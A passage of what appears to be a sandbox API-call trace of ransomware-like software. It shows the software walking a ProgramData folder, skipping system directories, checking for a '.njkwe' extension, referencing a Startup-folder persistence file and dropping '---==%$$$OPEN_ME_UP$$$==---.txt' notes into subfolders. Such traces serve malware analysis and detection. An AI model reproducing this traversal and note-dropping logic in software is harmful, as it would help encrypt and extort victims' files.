hTemplateFile=0x0) returned 0xffffffff [0073.360] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b60b8d0, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b60b8d0, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x29662597, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x666666, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Events_NormalCritical.rbs", cAlternateFileName="EVENTS~2.RBS")) returned 1 [0073.360] lstrcmpiW (lpString1="Events_NormalCritical.rbs", lpString2="Windows") returned -1 [0073.360] lstrcmpiW (lpString1="Events_NormalCritical.rbs", lpString2="$Recycle.bin") returned 1 [0073.360] lstrcmpiW (lpString1="Events_NormalCritical.rbs", lpString2="System Volume Information") returned -1 [0073.360] lstrcmpiW (lpString1="Events_NormalCritical.rbs", lpString2="Program Files") returned -1 [0073.360] lstrcmpiW (lpString1="Events_NormalCritical.rbs", lpString2="Program Files (x86)") returned -1 [0073.360] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_NormalCritical.rbs") returned 64 [0073.360] StrStrIW (lpFirst="Events_NormalCritical.rbs", lpSrch=".njkwe") returned 0x0 [0073.360] lstrcmpW (lpString1="Events_NormalCritical.rbs", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.360] lstrcmpW (lpString1="Events_NormalCritical.rbs", lpString2="taridd") returned -1 [0073.360] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_NormalCritical.rbs", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.360] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_NormalCritical.rbs" (normalized: "c:\\programdata\\microsoft\\diagnosis\\events_normalcritical.rbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.360] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b60b8d0, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b60b8d0, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x29662597, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x333333, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Events_Realtime.rbs", cAlternateFileName="EVENTS~4.RBS")) returned 1 [0073.360] lstrcmpiW (lpString1="Events_Realtime.rbs", lpString2="Windows") returned -1 [0073.360] lstrcmpiW (lpString1="Events_Realtime.rbs", lpString2="$Recycle.bin") returned 1 [0073.360] lstrcmpiW (lpString1="Events_Realtime.rbs", lpString2="System Volume Information") returned -1 [0073.360] lstrcmpiW (lpString1="Events_Realtime.rbs", lpString2="Program Files") returned -1 [0073.360] lstrcmpiW (lpString1="Events_Realtime.rbs", lpString2="Program Files (x86)") returned -1 [0073.360] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_Realtime.rbs") returned 58 [0073.360] StrStrIW (lpFirst="Events_Realtime.rbs", lpSrch=".njkwe") returned 0x0 [0073.360] lstrcmpW (lpString1="Events_Realtime.rbs", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.360] lstrcmpW (lpString1="Events_Realtime.rbs", lpString2="taridd") returned -1 [0073.360] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_Realtime.rbs", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.360] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_Realtime.rbs" (normalized: "c:\\programdata\\microsoft\\diagnosis\\events_realtime.rbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.361] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a029c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalTraceStore", cAlternateFileName="LOCALT~1")) returned 1 [0073.361] lstrcmpiW (lpString1="LocalTraceStore", lpString2="Windows") returned -1 [0073.361] lstrcmpiW (lpString1="LocalTraceStore", lpString2="$Recycle.bin") returned 1 [0073.361] lstrcmpiW (lpString1="LocalTraceStore", lpString2="System Volume Information") returned -1 [0073.361] lstrcmpiW (lpString1="LocalTraceStore", lpString2="Program Files") returned -1 [0073.361] lstrcmpiW (lpString1="LocalTraceStore", lpString2="Program Files (x86)") returned -1 [0073.361] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore") returned 54 [0073.361] lstrcmpW (lpString1="LocalTraceStore", lpString2=".") returned 1 [0073.361] lstrcmpW (lpString1="LocalTraceStore", lpString2="..") returned 1 [0073.361] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.361] GetProcessHeap () returned 0xbe0000 [0073.361] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.361] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\*") returned 56 [0073.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a029c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0073.361] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.361] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.361] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.361] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.361] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.361] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\.") returned 56 [0073.361] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.361] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.362] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.362] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.362] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\localtracestore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.362] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a029c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.362] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.362] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.362] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.362] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.362] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.362] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\..") returned 57 [0073.362] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.362] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.362] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.362] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.362] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.362] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a029c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.362] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0073.362] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 86 [0073.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\LocalTraceStore\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\localtracestore\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.363] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.364] CloseHandle (hObject=0x430) returned 1 [0073.364] GetProcessHeap () returned 0xbe0000 [0073.364] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.364] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a3dd985, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8a3dd985, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x28facbb4, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="osver.txt", cAlternateFileName="")) returned 1 [0073.364] lstrcmpiW (lpString1="osver.txt", lpString2="Windows") returned -1 [0073.364] lstrcmpiW (lpString1="osver.txt", lpString2="$Recycle.bin") returned 1 [0073.364] lstrcmpiW (lpString1="osver.txt", lpString2="System Volume Information") returned -1 [0073.364] lstrcmpiW (lpString1="osver.txt", lpString2="Program Files") returned -1 [0073.364] lstrcmpiW (lpString1="osver.txt", lpString2="Program Files (x86)") returned -1 [0073.364] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\osver.txt") returned 48 [0073.364] StrStrIW (lpFirst="osver.txt", lpSrch=".njkwe") returned 0x0 [0073.364] lstrcmpW (lpString1="osver.txt", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.364] lstrcmpW (lpString1="osver.txt", lpString2="taridd") returned -1 [0073.364] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\osver.txt", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.364] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\osver.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\osver.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.364] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bfbb1de, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8bfbb1de, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8bfbb1de, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="parse.dat", cAlternateFileName="")) returned 1 [0073.364] lstrcmpiW (lpString1="parse.dat", lpString2="Windows") returned -1 [0073.364] lstrcmpiW (lpString1="parse.dat", lpString2="$Recycle.bin") returned 1 [0073.364] lstrcmpiW (lpString1="parse.dat", lpString2="System Volume Information") returned -1 [0073.364] lstrcmpiW (lpString1="parse.dat", lpString2="Program Files") returned -1 [0073.364] lstrcmpiW (lpString1="parse.dat", lpString2="Program Files (x86)") returned -1 [0073.364] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\parse.dat") returned 48 [0073.364] StrStrIW (lpFirst="parse.dat", lpSrch=".njkwe") returned 0x0 [0073.364] lstrcmpW (lpString1="parse.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.364] lstrcmpW (lpString1="parse.dat", lpString2="taridd") returned -1 [0073.365] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\parse.dat", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.365] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\parse.dat" (normalized: "c:\\programdata\\microsoft\\diagnosis\\parse.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.365] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a06c3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Sideload", cAlternateFileName="")) returned 1 [0073.365] lstrcmpiW (lpString1="Sideload", lpString2="Windows") returned -1 [0073.365] lstrcmpiW (lpString1="Sideload", lpString2="$Recycle.bin") returned 1 [0073.365] lstrcmpiW (lpString1="Sideload", lpString2="System Volume Information") returned -1 [0073.365] lstrcmpiW (lpString1="Sideload", lpString2="Program Files") returned 1 [0073.365] lstrcmpiW (lpString1="Sideload", lpString2="Program Files (x86)") returned 1 [0073.365] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload") returned 47 [0073.365] lstrcmpW (lpString1="Sideload", lpString2=".") returned 1 [0073.365] lstrcmpW (lpString1="Sideload", lpString2="..") returned 1 [0073.365] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.365] GetProcessHeap () returned 0xbe0000 [0073.365] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.365] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\*") returned 49 [0073.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a06c3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0073.365] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.365] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.365] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.365] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.365] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\.") returned 49 [0073.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.365] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.365] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.365] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.366] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.366] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\sideload\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.366] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a06c3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.366] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.366] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.366] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.366] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.366] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.366] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\..") returned 50 [0073.366] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.366] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.366] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.366] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.366] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.366] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.366] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.366] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a06c3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.366] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0073.366] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 79 [0073.366] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\sideload\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.367] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.368] CloseHandle (hObject=0x430) returned 1 [0073.368] GetProcessHeap () returned 0xbe0000 [0073.368] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.368] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a0bca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Siufloc", cAlternateFileName="")) returned 1 [0073.368] lstrcmpiW (lpString1="Siufloc", lpString2="Windows") returned -1 [0073.368] lstrcmpiW (lpString1="Siufloc", lpString2="$Recycle.bin") returned 1 [0073.368] lstrcmpiW (lpString1="Siufloc", lpString2="System Volume Information") returned -1 [0073.368] lstrcmpiW (lpString1="Siufloc", lpString2="Program Files") returned 1 [0073.368] lstrcmpiW (lpString1="Siufloc", lpString2="Program Files (x86)") returned 1 [0073.368] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc") returned 46 [0073.368] lstrcmpW (lpString1="Siufloc", lpString2=".") returned 1 [0073.368] lstrcmpW (lpString1="Siufloc", lpString2="..") returned 1 [0073.368] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.368] GetProcessHeap () returned 0xbe0000 [0073.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.369] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\*") returned 48 [0073.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a0bca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0073.369] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.369] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.369] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.369] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.369] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.369] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\.") returned 48 [0073.369] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.369] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.369] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 